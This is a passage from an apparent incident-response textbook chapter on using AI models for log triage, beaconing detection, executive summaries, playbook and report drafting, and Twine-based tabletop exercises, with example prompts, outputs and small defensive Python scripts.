| 12:06:48        | 173.166.135.199 | 7922 (Comcast) | Columbia, MD | Edge Browser      | SUCCESS |

Here we see that, after five failed spray attempts, the attacker successfully authenticated at 03:40:22 via Azure CLI from AWS. The legitimate user later logged in from Maryland approximately eight hours after the compromise, unaware of the intrusion.

This initial triage can help analysts prioritize where to focus detailed manual analysis. Rather than reviewing thousands of log entries sequentially, the analyst can focus on the specific patterns and time windows the AI identified as anomalous, referring back to the original logging data or SIEM as needed for verification.
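This verification step can itself be scripted. As a minimal sketch, the failures-then-success pattern from Table 4 can be checked programmatically; the field names here are assumptions based on the summarized output, not the actual JSON export:

```python
def find_spray_success(events, min_failures=3):
    """Flag a success that follows a run of failed attempts against the same account."""
    hits = []
    failures = 0
    for e in sorted(events, key=lambda e: e["time"]):
        if e["result"] == "FAIL":
            failures += 1
        else:
            if failures >= min_failures:
                hits.append(e)
            failures = 0
    return hits

events = [
    {"time": "02:51:01", "ip": "3.12.217.120", "result": "FAIL"},
    {"time": "03:35:24", "ip": "3.12.217.149", "result": "FAIL"},
    {"time": "03:37:10", "ip": "44.210.66.209", "result": "FAIL"},
    {"time": "03:38:14", "ip": "3.15.35.2", "result": "FAIL"},
    {"time": "03:39:18", "ip": "3.15.35.215", "result": "FAIL"},
    {"time": "03:40:22", "ip": "3.12.216.177", "result": "SUCCESS"},
    {"time": "12:06:25", "ip": "173.166.135.199", "result": "SUCCESS"},
]

suspicious = find_spray_success(events)  # flags the 03:40:22 success
```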

Beaconing Detection: Network Proxy Data

Network proxy logs can reveal command-and-control communication through beaconing patterns. Beaconing traffic exhibits regular timing patterns that distinguish it from more typical network traffic, but identifying these patterns in large log files containing tens of thousands of entries requires significant manual analysis.

An analyst reviewing proxy logs for suspected C2 beaconing can upload the log file and request analysis using a prompt, such as the one shown in Figure 9.

Claude prompt with attached proxy access log requesting beaconing behavior analysis with specific detection criteria
Figure 9. Beaconing Detection Prompt

In this example, Claude Opus analyzed the proxy log structure and identified the need for statistical analysis to detect beaconing behavior based on the regularity of request intervals. Rather than providing a simple pattern match, the model recognized that effective beaconing detection would require calculating the coefficient of variation for request intervals to distinguish machine-generated traffic from human browsing. It then generated a Python script to perform this analysis, as shown in Figure 10.

Claude generating a Python beaconing detection script with suspicious domain analysis logic
Figure 10. Beaconing Analysis Python Script
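As a simplified illustration of the coefficient-of-variation technique (not the model-generated script itself; the detection threshold is an assumption), the core logic looks like this:

```python
import statistics

def interval_cv(timestamps):
    """Coefficient of variation of inter-request intervals; near zero indicates machine-like regularity."""
    intervals = [b - a for a, b in zip(timestamps, timestamps[1:])]
    mean = statistics.mean(intervals)
    return statistics.stdev(intervals) / mean if mean else float("inf")

def is_beacon(timestamps, cv_threshold=0.1):  # threshold is an illustrative assumption
    return len(timestamps) > 10 and interval_cv(timestamps) < cv_threshold

# Simulated request times: a beacon every ~5 seconds vs. irregular human browsing
beacon = [float(5 * i) for i in range(100)]
human = [0.0, 3.2, 41.0, 44.5, 190.0, 300.7]
```

A perfectly regular beacon yields a CV near zero, while human browsing produces highly variable intervals and a much larger CV.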

After the analysis, the model identified critical findings, as shown in Figure 11, including two highly suspicious domains exhibiting C2 beaconing behavior.

Claude beaconing analysis results identifying a typosquat C2 domain with five-second interval automated requests
Figure 11. Beaconing Analysis Results

The analysis revealed multiple compromised hosts communicating with suspected C2 infrastructure, including a typosquat domain masquerading as Google Analytics services. The model integrated online cyber threat intelligence during its analysis, identifying that www1-google-analytics.com used a common typosquatting technique with the www1- prefix to deceive users and security tools. Key findings from the analysis are summarized in Table 5.

Table 5. Beaconing Detection Findings Summary
| Domain                    | Suspicious Indicators                                                                                       | Beacon Interval | Affected Hosts | Confidence |
|---------------------------|-------------------------------------------------------------------------------------------------------------|-----------------|----------------|------------|
| www1-google-analytics.com | Typosquat domain, HTTP protocol (not HTTPS), extremely regular intervals (CV=0.02), high volume (9,075 requests) | ~5 seconds      | 4 hosts        | Very High  |
| email.falsimentis.com     | Unknown domain, HTTP protocol, near-perfect 60-second intervals (CV=0.004), POST method with query string      | ~60 seconds     | 4 hosts        | High       |

This example demonstrates how AI models can not only identify suspicious patterns but also determine the appropriate analytical approach, implement the analysis methodology, and integrate external threat intelligence to provide comprehensive findings that would traditionally require manual statistical analysis and open-source intelligence gathering.

Limitations and Considerations

AI log analysis can accelerate incident response, but it also has several inherent limitations that analysts should understand when evaluating findings.

Incomplete Detection

Models may miss subtle indicators that experienced analysts would recognize. Complex attack patterns, novel techniques, or carefully crafted evasion methods might escape detection when relying solely on AI analysis. AI serves as a valuable first-pass triage tool, not a comprehensive security control.

False Positive Risk

Models can generate false-positive alerts that mislead the analysis team and waste valuable time during response efforts. Legitimate but unusual patterns may be flagged as suspicious, requiring analysts to verify each finding before taking action.

Lack of Definitive Conclusions

AI log analysis may struggle to provide definitive conclusions about attacker activity. Models that lack the contextual understanding for authoritative attribution often hedge assertions with phrases like "may be" or "looks like," leaving it to the analyst to make an impact assessment. Thorough manual review remains essential for critical investigations.

Context Window Constraints

AI models operate within fixed context window limits that constrain how much log data can be analyzed in a single interaction. Frontier models like Claude Opus 4.5 support context windows of 200,000 tokens, roughly equivalent to 150,000 words or 500 pages of text. While substantial, this limit poses challenges when analyzing enterprise log collections that routinely contain millions of entries.

Direct analysis approaches work well for focused investigations involving small to medium log sets. An analyst can attach several thousand lines of authentication logs, proxy records, or application events to a chat interface and receive useful pattern analysis within the model’s context window. This approach suits initial triage, spot checks, or targeted investigations where relevant log segments have already been identified.

However, comprehensive log analysis during major incidents often requires processing volumes that exceed context window capacity. Analyzing a week of authentication logs from an enterprise directory service, reviewing firewall logs across multiple network boundaries, or correlating application logs from distributed systems generates data volumes that cannot fit in a single model interaction.

For large-scale log analysis, agentic approaches offer solutions that overcome limitations of context windows. Agent-based systems can process log data iteratively, analyzing segments within context window constraints and maintaining state across multiple interactions. We’ll explore these use cases in Section 1.5.2.
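A rough sketch of this segmentation idea, using the common approximation of four characters per token (an assumption, not an exact tokenizer), shows how log data can be divided to fit a context budget while a running summary carries state between iterations:

```python
def chunk_logs(lines, token_budget=50_000, chars_per_token=4):
    """Group log lines into chunks that fit an approximate token budget."""
    chunks, current, size = [], [], 0
    for line in lines:
        est = len(line) // chars_per_token + 1  # rough per-line token estimate
        if current and size + est > token_budget:
            chunks.append(current)
            current, size = [], 0
        current.append(line)
        size += est
    if current:
        chunks.append(current)
    return chunks

# An agent loop would then analyze each chunk, carrying forward a summary:
# summary = ""
# for chunk in chunk_logs(log_lines):
#     summary = model_analyze(chunk, prior_findings=summary)  # hypothetical call
```

Real agent frameworks handle this iteration and state management automatically, but the underlying pattern is the same: bounded segments, accumulated findings.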

Translating Technical Findings for Stakeholders

Incident response teams need to communicate with diverse audiences: executive leadership needs business-impact summaries, legal teams need specific technical details for regulatory filings, and stakeholders need clear guidance on service disruptions. Producing the messaging that meets each audience’s needs can be challenging. Analysts skilled at digital forensics, threat hunting, and vulnerability assessment are not always equally proficient at technical writing and audience-appropriate communication.

This is another opportunity for analysts to leverage AI models, accelerating the writing of documents, reports, summaries, and status reports for different stakeholders.

Executive Summary Generation

Given a technical timeline of attacker activity, an analyst can use a model to transform the details into executive-appropriate language. For example, consider the prompt shown in Listing 5, which outlines a timeline of attacker activity following a workstation breach, including lateral movement and data exfiltration prior to detection.

Listing 5. Executive Summary Generation Prompt
Transform the following technical incident timeline into an executive summary suitable for senior leadership. Focus on business impact, risk exposure, and response actions. Avoid technical jargon. The summary should be no more than five bullet points.

Technical Timeline:

- 2026-01-07 14:32 Initial access via phishing email to user jwalcott@falsimentis.com on FM-CEO
- 2026-01-07 14:45 Malware execution, C2 beacon established to 203.0.113.47
- 2026-01-07 15:12 PowerShell script execution for credential harvesting from Chrome local storage
- 2026-01-07 15:34 Lateral movement to file server FM-FS01 using harvested credentials
- 2026-01-07 16:02 Data staging, 2.3GB archived to C:\Users\Public\backup.zip
- 2026-01-07 16:18 Data exfiltration to Box.com cloud storage
- 2026-01-07 16:45 Possible infostealer binary executed on FM-FS01
- 2026-01-07 16:45 FM-FS01 EDR alert triggered, investigation initiated

Using ChatGPT, the model produces the executive summary shown here:

  • Confirmed security incident with unauthorized access began when an employee was tricked into opening a malicious email, allowing an external actor to gain access to a company device and then expand into a critical internal file server.

  • Business risk includes potential data exposure: approximately 2.3GB of company data was collected and appears to have been transferred outside the organization to a third-party cloud storage service, creating potential confidentiality, regulatory, and contractual impact.

  • The attacker attempted to capture account credentials (saved login information) and used them to move deeper into the environment, increasing the risk of continued access to additional systems beyond what has been identified so far.

  • Security monitoring detected the activity and triggered an alert, prompting the organization to begin incident response actions, including investigation and containment efforts focused on preventing further access and limiting additional data loss.

  • Immediate response priorities are to confirm exactly what data was accessed, secure affected accounts and systems, assess legal/notification obligations if sensitive data is involved, and implement additional controls to reduce the likelihood of recurrence (e.g., stronger email protections and access safeguards).

This transformation preserves essential information for the intended audience, allowing the analyst to focus on investigation efforts while still communicating pertinent information. This technique is also easily adaptable to other audiences, including legal teams, key stakeholders, and GRC teams.

The analyst should always verify the accuracy of the model-generated output and adjust the tone to match organizational communication standards before distribution.

Intermediate Use Cases

Now that we’ve looked at some introductory use cases, let’s explore more sophisticated AI applications to accelerate incident response. The following use cases employ more complex, structured prompts to generate more sophisticated output: playbooks that guide investigation procedures, report drafts that document incident findings, and exercise scenarios that test organizational readiness.

Generating Incident Response Playbooks

Playbooks provide step-by-step guidance for responding to specific incident types. Effective playbooks integrate a response process (such as the DAIR model or NIST SP 800-61) with techniques specific to the Event of Interest (EOI) being investigated.

Playbooks are valuable for analysts, especially during active incidents, providing guidance on what to do next when investigating an EOI or IOC. They are also valuable for the organization, ensuring consistent response practices across different analysts and teams. Playbooks should be customized for the organization’s environment, tools, and policies.

Writing comprehensive playbooks manually can be tedious. Attack techniques evolve, requiring frequent updates to playbooks. Further, there is a seemingly endless supply of TTPs used by attackers, warranting lots of different playbooks, or complex documents that cover the playbook needs across different attacker tactics. AI models can accelerate playbook development by generating initial drafts that analysts then refine and customize.

Structured Prompt for Playbook Generation

Supporting the response process described in the DAIR model, I wrote a structured prompt to guide the model in generating incident response playbooks. [3] This prompt is lengthy but provides clear instructions, output format definitions, reasoning steps, and context to help the model produce high-quality playbooks based on the described EOI, available at https://urls.sec504.org/playbookprompt.

GitHub Gist showing structured prompt instructions for AI-assisted incident response playbook generation
Figure 12. IR Playbook Generation Structured Prompt
I developed and tested the IR playbook prompt for the DAIR model primarily using ChatGPT models, though it will also work with other platforms that support structured prompting.

The prompt uses structured Markdown formatting and XML-style tags to delineate instructions, context, and output requirements. An excerpt of the structure in the prompt is shown in Listing 6.

Listing 6. DAIR Model Incident Response Playbook Generation Prompt
$ wget -q https://urls.sec504.org/playbookprompt -O playbookprompt.txt
$ grep -E "^#" playbookprompt.txt
# Role and Objective/Task (1)
# Instructions
# Reasoning Steps
# Output Format
## Overview
## Description
### Detect Steps
### Verify Steps
### Triage Steps
### Scope Steps
### Contain Steps
### Eradicate Steps
### Recover Steps
### Debrief Steps
## References
## Version Control
# Example Playbook
# Summary
1 Some output has been removed for brevity.

Pasting the prompt into the model chat interface prompts the model to ask for the specific EOI to be investigated, along with organizational context such as tools in use, policies, and environmental details. Supplying an EOI, such as a need to respond to a possible Windows infostealer malware with data exfiltration via cloud storage, will direct the model to produce a playbook draft, as shown in the example in Figure 13.

ChatGPT generating a Windows infostealer with cloud storage exfiltration incident response playbook in Markdown
Figure 13. Playbook Generation Model Response
Generating the playbook will take several minutes as the model works through the detailed instructions and output format requirements. Explicitly specifying the use of the ChatGPT thinking model is not required, but it helps ensure the model applies reasoning steps effectively during generation.

The model will generate a complete playbook that integrates the DAIR response process with techniques specific to the described EOI in Markdown format. Analysts can use the Markdown format directly, or convert it to HTML, Microsoft Word, or other formats as needed. An excerpt from the generated playbook is shown in Listing 7 (a full example is available at https://urls.sec504.org/playbookexample).

Listing 7. Playbook Generation Output Excerpt
# IR Playbook - Windows Infostealer With Cloud Storage Exfiltration

## Overview

The purpose of this playbook is to guide incident responders through detection, verification, triage, scoping, containment, eradication, and recovery for a suspected Windows infostealer infection where stolen data is being staged and exfiltrated via a cloud storage service (e.g., OneDrive/SharePoint, Dropbox, Google Drive, Box).

## Description

This event involves one or more Windows endpoints exhibiting infostealer behavior (suspicious process execution, unusual browser data access, new persistence artifacts, credential access activity) along with indications of outbound data transfer to cloud storage. The EOI may originate from EDR telemetry, proxy/DNS/firewall logs, abnormal user sign-ins, cloud audit logs showing unusual file uploads, or user-reported symptoms (unexpected MFA prompts, account lockouts, "new device" sign-ins). Typical infostealers are commodity malware-as-a-service families with rapid delivery and frequent infrastructure churn, often used to bootstrap follow-on access.  [oai_citation:1‡Microsoft](https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/?utm_source=chatgpt.com)

## Dynamic Approach to Incident Response

Apply these steps to detect, verify and triage, scope, contain, eradicate, and recover from the incident.

### Detect Steps

Apply the following steps to investigate the Event of Interest (EOI). Use the information provided by the user to guide the investigation.

Start by capturing the "minimum viable facts" so your investigation doesn’t drift. You’re trying to answer: **which hosts**, **which users/identities**, **which cloud storage provider**, **what data**, and **when**.

**Inputs to gather immediately (answer what you can now):**
- Which telemetry exists: EDR (Defender/MDE/CrowdStrike), SIEM, web proxy, DNS logs, firewall logs, M365/Entra audit logs, CASB?
- Cloud storage in scope: OneDrive/SharePoint, Dropbox, Google Drive, Box, others?
- Scope hints: single host/user or multiple? any VIPs? any regulated data?

Then perform endpoint-centric detection on the suspect host(s):

- Confirm basic host and logged-on user context:

  ```powershell
  hostname
  whoami
  quser
  ipconfig /all
  Get-Date
  ```

The playbook continues with detailed steps for each DAIR process waypoint, tailored to the specific EOI.

Refining Generated Playbooks

AI-generated playbooks require review and refinement before operational use. AI can accelerate playbook drafting, but analysts should ensure the output is accurate, complete, and customized to the organization's environment. Key refinement steps include:

  • Verify that commands and queries are syntactically correct.

  • Adjust tool references to match actual organizational tools.

  • Add organization-specific contacts, escalation paths, and approval requirements.

  • Remove or flag any steps that don’t apply to the environment.

  • Test procedures where possible to confirm they work as described.

After refining a generated playbook, consider using the refined version as an example in subsequent prompts. This one-shot prompting approach helps the model better match the desired output format and level of detail.

Drafting Incident Reports

As we saw in Completing Incident Documentation, incident documentation is an important part of the debrief process, preserving institutional knowledge, supporting compliance, and serving as reference material for future incidents. AI can accelerate the transformation of investigation findings into structured reports tailored for different audiences.

Report Draft Generation

AI models can assist in drafting incident reports by organizing investigation findings into structured formats. By supplying incident findings along with a prompt that defines the desired report structure and audience, analysts can quickly generate draft reports to review and refine.

For example, using the details provided for a sample incident stemming from a workstation compromise via a vulnerable Adobe Reader exploit, we can prompt the model to draft an executive summary report, as shown in Listing 8. [4]

Listing 8. Executive Report Draft Prompt with Incident Findings
Using the incident findings below, create a draft incident summary report suitable for executive leadership. Follow this structure:

1. Executive Overview (incident type, detection date, brief description, business impact)
2. Key Findings (what happened, what was affected, what data was at risk)
3. Response Actions Taken (containment, eradication, recovery status)
4. Recommendations (immediate actions, longer-term improvements)
5. Decisions Required (what leadership needs to approve or fund)

~~~~
# Incident Findings - SampleCorp Breach

## Affected Systems

- WKST01.samplecorp.com (development environment, source code and API credentials)
- HR01.samplecorp.com (HR system, employee PII including SSNs)

## Timeline

- 2026-01-15 00:27 - Employee opened malicious PDF (cv.pdf) exploiting Adobe Reader vulnerability
- 2026-01-15 00:35 - Unauthorized access to development directories and API keys
- 2026-01-15 00:50 - Lateral movement via buffer overflow in HR application
- 2026-01-15 01:30 - Employee database compressed and exfiltrated via SSH tunnel
- 2026-01-15 02:30 - SOC detected activity, isolated systems via VLAN
- 2026-01-15 03:43 - Firewall rules updated blocking C2 IP 192.168.220.66
- 2026-01-15 04:11 - Malware removed from both systems
- 2026-01-15 05:21-05:58 - Both systems restored from verified backups

## Technical Details

- Initial vector: Malicious PDF exploiting CVE in Adobe Reader 10.0

[...] (1)
1 Additional technical details omitted for brevity.

For this example, we used Claude Opus to generate the report. Without specifying the desired output format, Claude Opus generated a Microsoft Word document that summarizes the technical details of the incident findings in a structured report, as shown in Figure 14.

Claude response with review notes on breach notification timing and regulatory language in the draft report
Figure 14. Completed Executive Report Prompt Results

Organizing the findings into the requested structure, the model converted the technical details into language appropriate for an executive audience, identifying gaps where additional information might be needed. An excerpt of the report is shown in Figure 15.

Microsoft Word document showing the AI-generated SampleCorp incident summary report with executive overview and key findings
Figure 15. Executive Report Draft Output Excerpt
I’ve covered this before in the chapter, but I think it bears repeating. Draft reports must be thoroughly reviewed to ensure accuracy before distribution. AI may misinterpret findings and draw incorrect conclusions, add plausible-sounding details not present in source data, omit important findings that don’t fit expected patterns, or use inappropriate tone or terminology for the audience. Treat AI-generated reports as starting points that accelerate formatting and organization, not finished products ready for distribution.
Enhancing Report Quality with Specialized Knowledge

AI models can do a reasonable job of generating incident reports based on supplied findings. However, generic models lack specialized knowledge of what makes incident response reports effective and don’t have access to organizational preferences for report structure, tone, content, or other best-practice guidance.

Without specialized guidance, models produce reports that are helpful but not distinctive. Reports need an appropriate tone, clear executive summaries, prioritized remediation steps, and a structure that serves both immediate response needs and long-term organizational learning. The difficulty is that appropriate, clear, prioritized, and structured are not the same for every organization, and the model has no way of knowing those preferences without explicit input.

Specialized Knowledge Integration with MCP

Providing AI models with access to specialized incident response reporting guidance and previously-generated report samples can significantly improve the quality of AI-generated reports. Rather than relying solely on the model’s training data about incident reports in general, the model can reference specific best practices and quality criteria developed by experts in the field.

MCP provides a standardized method for connecting AI models to external tools and data sources that supply specialized knowledge. MCP servers expose capabilities that AI models can query to retrieve relevant guidance when needed. An analyst working on a report draft can request evaluation against IR-specific quality criteria, and the model retrieves those criteria from an MCP server rather than requiring them to be embedded in every prompt.

We’ll cover MCP in greater detail in Section 1.5.

MCP servers can provide specialized knowledge for incident response reporting. Quality criteria help models evaluate draft reports against established standards for executive summaries, impact framing, tone, and appropriateness of technical detail. Report structure guidance ensures that models generate reports with sections and an organization appropriate to different incident types. Best-practice recommendations help models suggest remediation steps, communication strategies, and post-incident actions informed by incident response expertise.

Organizations can integrate these specialized knowledge sources through several approaches, each with different implementation complexity and data handling characteristics. Publicly accessible MCP servers provide general best practices that apply across organizations. Internal MCP servers can host organization-specific guidance, templates, and quality standards. Hybrid approaches combine external best practices with internal customizations to balance standardization with organizational needs.

For organizations unable to deploy MCP servers, specialized knowledge can be embedded directly in prompts or maintained in local documentation that analysts can reference when prompting models for report generation.
Zeltser IR Report Guidance

My friend and SANS faculty fellow Lenny Zeltser developed an MCP server that provides specialized guidance for incident response report generation and evaluation. Lenny took his years of experience writing incident reports and teaching effective report writing and codified best practices into a freely available MCP server that AI models can query to improve report quality. [5]

The MCP server offers three primary capabilities that assist analysts throughout the report-writing process:

  • Report creation assistance provides guidance across executive summaries, technical timelines, root cause analysis sections, and remediation recommendations. The guidance is adaptive based on incident type (for example, recognizing that ransomware incident reports have a different emphasis than business email compromise or insider threat documentation).

  • Draft evaluation assesses existing reports against quality criteria specific to incident response, including executive summary clarity, impact communication, a tone that avoids blame, and action-item prioritization.

  • Multi-report support addresses various security documentation needs beyond just incident response, though optimization focuses on IR use cases.

Analysts can connect Claude, ChatGPT, or other compatible tools to the Zeltser report writing server using standard MCP configuration, as shown in Listing 9 and in the Figure 16.

Listing 9. MCP Server Configuration Command
claude mcp add zeltser-search --transport http https://website-mcp.zeltser.com/mcp
Claude Code terminal adding the Zeltser search MCP server via HTTP transport configuration
Figure 16. MCP Server and Claude Code Configuration Example

Once configured, analysts working on incident response reports can request assistance with report evaluation or generation, and the model will direct the AI client to query the MCP server for relevant guidance. For example, after adding the MCP server as zeltser-search in Claude Code, I asked it to evaluate a report draft using the following prompt:

Review the IR report in @Incident\ Report.docx using zeltser-search.

Claude Code using the Zeltser search MCP server to review an incident response report
Figure 17. MCP Server and Claude Code, Report Advice Prompt

In this example, using the Hack The Box SampleCorp Breach report by Sebastian Hague, Claude Opus evaluated the report contents, drawing on guidance from the Zeltser MCP server to identify recommendations for improvement. [6] Zeltser’s MCP server applied specialized knowledge about IR reporting best practices to identify several areas for improvement, as shown in Listing 10.

Listing 10. Zeltser MCP Server Report Evaluation Output
Areas for Improvement by Section

Executive Summary

* Issue: Too long (approximately 500+ words vs. recommended 150 words maximum)

  The executive summary should be drastically shortened. Executives need the essential facts quickly. Consider this structure:

  On April 22, 2019 at 01:05 UTC, SampleCorp's SOC detected unauthorized
  access after an employee opened a malicious PDF. The attacker compromised
  two systems (WKST01 and HR01) containing proprietary code and employee data
  including SSNs. [CLARIFY: Data was/was not exfiltrated]. SOC contained the
  incident within 5 hours. Root causes: outdated Acrobat Reader, buffer overflow
  in proprietary HR app, and inadequate network access controls. Immediate actions
  complete; network segmentation and access controls being implemented. [If data
  was exfiltrated: Regulatory notifications in progress per GDPR/state breach laws.]

  Current stakeholder impact details should move to the dedicated Impact Analysis section, not the executive summary.

Timeline Issues

* Missing timezone: The report uses times like "01:05:00" without specifying the timezone. Given that SampleCorp may have offices or stakeholders in multiple locations, every timestamp should include timezone (e.g., "01:05:00 UTC" or "01:05:00 EDT").

  Example from timeline:
  - Current: "April 22nd, 2019, 00:27:27"
  - Better: "April 22nd, 2019, 00:27:27 UTC"

This is especially important for regulatory notifications with strict timeframes.
[...]

Summary

This is a technically strong report with excellent forensic detail and clear response documentation. The primary issues are:

  1. Critical data exfiltration inconsistency that must be resolved
  2. Executive summary too long for busy executives
  3. Missing ownership and timelines in lessons learned
  4. Regulatory obligations not addressed despite potential PII exposure
  5. Lack of quantification in business impact areas

With this guidance, the analyst can make changes to the report or ask the model to review the report accordingly. Zeltser’s MCP server enables analysts to leverage specialized incident response reporting knowledge without having to embed that knowledge in every prompt, thereby significantly improving the quality of AI-generated reports.

Creating Tabletop Exercise Scenarios

In Conduct Tabletop Exercises and Incident Response Drills, we looked at the value of tabletop exercises for testing organizational readiness and guiding teams through hypothetical incident scenarios. Crafting engaging, realistic scenarios is an important part of effective exercises, but it is also time-consuming and challenging: an effective scenario must balance realism, complexity, and learning objectives, and realism requires an understanding of current threats, organizational context, and organization-specific details about existing systems. A single detractor who finds the scenario unrealistic can undermine the entire exercise, so it falls to the facilitator to design scenarios that engage participants, bringing realism, creativity, and energy to the exercise.

AI tools can help in designing tabletop scenarios, artifacts, and supporting elements, relieving some of the burden on exercise facilitators. This section demonstrates three approaches to AI-assisted scenario generation, progressing from simple idea generation to organizationally-grounded scenarios to interactive and gamified exercise formats.

Generating Scenario Ideas

Facilitators beginning scenario development can use straightforward prompts to generate initial concepts based on current threat landscapes. A basic prompt requests scenario ideas without requiring detailed organizational context or technical artifacts.

For example, a facilitator might prompt the model with a request like the one shown in Listing 11.

Listing 11. Basic Tabletop Exercise Scenario Prompt
Generate three tabletop exercise scenario concepts for an incident response team. Each scenario should:

- Be based on current threat actor techniques and realistic attack patterns
- Target a mid-sized organization in the healthcare sector
- Progress through multiple phases allowing discussion at each stage
- Include decision points that test communication, escalation, and containment procedures
- Run approximately 90 minutes with a facilitator guiding discussion

For each scenario, provide:
- Initial compromise method
- Three progressive injects that complicate the response
- Key learning objectives
- Discussion questions for each phase

Using Google Gemini, the model produced several scenario concepts, including the example shown in Listing 12.

Listing 12. Google Gemini Tabletop Exercise Scenario Example
# Scenario 1: The "Extorted Identity"

**Theme:** Adversary-in-the-Middle (AiTM) Phishing & Double Extortion Ransomware
**Target:** Mid-sized Healthcare Organization (Finance/Billing Department)
**Estimated Duration:** 90 Minutes

## 1. Concept Overview

A sophisticated threat actor utilizes a session-hijacking phishing attack to bypass Multi-Factor Authentication (MFA). The primary goal is to target the Finance and Billing department to exfiltrate Patient Health Information (PHI) and financial records before deploying a ransomware payload to maximize leverage.

## 2. Initial Compromise

A senior Billing Coordinator receives an "urgent" email appearing to be from the hospital's CFO. The email contains a link to a "Video Memo" regarding urgent 2026 payroll tax changes. The video uses **AI-generated deepfake audio and video** of the CFO.

When the coordinator clicks the link, they are directed to a proxy login page that mimics the organization’s Microsoft 365 portal. The coordinator enters their credentials and completes the MFA prompt. The attacker’s proxy server captures the **active session token**, allowing them to bypass MFA entirely and access the coordinator's mailbox and cloud storage.

## 3. Progressive Injects

### Inject 1: Detection & Initial Response (T + 30 mins)

The Security Operations Center (SOC) triggers a high-severity alert: "Anomalous Data Movement." Forensic logs show the Billing Coordinator’s account is transferring large volumes of data to an unrecognized IP address in Eastern Europe. Simultaneously, Azure AD logs show the account is logged in from both the hospital’s local IP and a known VPN exit node.
[...] (1)
1 Content removed for brevity.

In this example, the model generated multiple scenario concepts that facilitators can evaluate for relevance to organizational needs. This approach works well when exploring different incident types or when facilitators need inspiration for exercise themes. Generated concepts serve as starting points that facilitators can refine based on team maturity, recent incidents, or specific skills the exercise should develop.

Organizationally-Grounded Scenarios

More sophisticated scenario development incorporates actual organizational data to increase realism and relevance. By providing AI models with sanitized copies of log files, network diagrams, asset inventories, or authentication records, facilitators can generate scenarios that reflect the actual technical environment participants will recognize.

This approach addresses a common limitation of generic tabletop exercises where participants struggle to connect hypothetical scenarios to their real infrastructure, tools, and procedures. Scenarios grounded in organizational artifacts use familiar system names, realistic user accounts, and actual log formats, making the exercise more engaging and the lessons more transferable to real incidents.

Consider a business email compromise scenario where the facilitator wants to create realistic authentication and email activity patterns. The facilitator can provide the AI model with a Microsoft 365 audit log export (appropriately sanitized using techniques described in Section 1.1.2) along with a structured prompt as shown in Listing 13.

Listing 13. Organizationally-Grounded Tabletop Exercise Scenario Prompt
Using the Microsoft 365 audit log data attached, develop a business email compromise tabletop exercise scenario. The scenario should:

- Use actual usernames, email patterns, and authentication behaviors from the logs to establish realistic baseline activity
- Identify a plausible initial compromise vector consistent with the authentication patterns observed
- Create a timeline of attacker actions that would produce log entries similar in format and structure to the provided data
- Include three progressive injects that reveal new information through additional log entries
- Provide facilitator guidance on what log patterns participants should identify at each phase

Learning objectives:

- Email header analysis for spoofing detection
- Correlation of authentication logs with email activity
- Escalation procedures for financial fraud attempts
- Communication with executive stakeholders during active fraud attempts

Target duration: 30 minutes
Google Gemini prompt requesting a business email compromise tabletop exercise scenario from Microsoft 365 audit logs
Figure 18. Google Gemini Organizationally-Grounded Tabletop Exercise Scenario Generation

In this example, we used Google Gemini with a Microsoft 365 interactive login data file to supply context for the scenario. The model analyzed the log file structure, identified normal patterns in the data, and generated a scenario in which attacker activity would appear as anomalies relative to the established baseline. The compromise vector, injects, and facilitator guidance all reflected events in the supplied logging data, making the exercise feel authentic to participants familiar with their environment.

The fastest way to combat participant complaints of "this isn’t realistic" is to ground the scenario in actual organizational data.
Gemini-generated tabletop exercise scenario with user profiles and baseline activity from actual tenant log data
Figure 19. Google Gemini Tabletop Exercise Scenario Output

Facilitators can apply this approach with various organizational artifacts, including network traffic captures for intrusion detection scenarios, cloud audit logs for insider threat exercises, or EDR telemetry for malware response training. The important requirement is to provide sufficient sample data for the model to understand the format, structure, and normal patterns, while applying prudent caution to sanitize sensitive information.
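As a simple illustration of that sanitization step, the sketch below pseudonymizes user identities and client IP addresses in a Microsoft 365-style audit event before the data is shared with a model. The field names (UserId, ClientIP) and the sanitize_event helper are illustrative assumptions, not a prescribed schema; hashing produces stable tokens so correlations across events survive sanitization.

```python
import hashlib
import json

def pseudonym(value: str, prefix: str) -> str:
    """Replace a sensitive value with a stable, non-reversible token."""
    digest = hashlib.sha256(value.encode()).hexdigest()[:8]
    return f"{prefix}-{digest}"

def sanitize_event(event: dict) -> dict:
    """Pseudonymize user identities and IP addresses in one audit event."""
    clean = dict(event)
    if "UserId" in clean:
        clean["UserId"] = pseudonym(clean["UserId"], "user")
    if "ClientIP" in clean:
        clean["ClientIP"] = pseudonym(clean["ClientIP"], "ip")
    return clean

# Example Microsoft 365-style audit event (field values are illustrative)
event = {"Operation": "UserLoggedIn", "UserId": "jsmith@samplecorp.com",
         "ClientIP": "203.0.113.25"}
print(json.dumps(sanitize_event(event)))
```

Because the same input always yields the same token, the model can still correlate activity by one account across many events without ever seeing the real identity.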

Gamified, Interactive Exercise Generation with Twine

A more sophisticated approach to AI-assisted tabletop scenario development produces interactive formats that participants can navigate through branching decision paths. Twine, an open-source tool for creating nonlinear interactive narratives, provides an effective platform for tabletop exercises where participant choices affect scenario progression. [7] Twine is widely used for interactive storytelling and game development, allowing authors to develop complex branching scenarios with rich media and conditional logic, as shown in Figure 20. Twine produces HTML output, allowing authors to customize the storytelling experience with custom CSS and other rich content, producing interactive decision elements like the example shown in Figure 21.

Think of Twine as a tool for creating "choose your own adventure"-style stories where the reader makes choices that influence the narrative path. Through rich media, scripting capabilities, and conditional logic, Twine can create complex interactive experiences as HTML, making it a great option for gamified tabletop exercises.
Twine story editor showing interconnected passage nodes for an incident response book authoring exercise
Figure 20. Twine Story Authoring Interface
Browser rendering of a Twine interactive story with narrative text and two branching choice links
Figure 21. Twine HTML Output Example

Traditional tabletop exercises often use linear progressions in which facilitators reveal injects at predetermined intervals or when they deem appropriate. Interactive formats allow exercises to branch based on choices, showing participants the consequences of different response strategies. For example, if participants choose immediate containment before scoping, the scenario might reveal unrecognized compromises and missed opportunities to effectively contain the entire incident. Alternatively, if the participants use an IOC to effectively scope the breadth of the incident, they might unlock more evidence that provides valuable insight into attacker tactics that can be applied later in the scenario.

AI models can generate Twine-compatible output files (.twee) that facilitators can import directly into Twine for interactive exercise delivery. Twee files are plain text that define passages (scenario states) and links (choices) in a structured format, as shown in the example in Listing 14.

Listing 14. Twee Format Example
:: StoryTitle
The Incident Response Book Author

:: Start
You sit down at your desk, coffee in hand, ready to write your book on incident response. The blank page stares back at you.

Where do you begin?

[[Start with the fundamentals of IR->Fundamentals]]
[[Jump straight into real-world case studies->CaseStudies]]

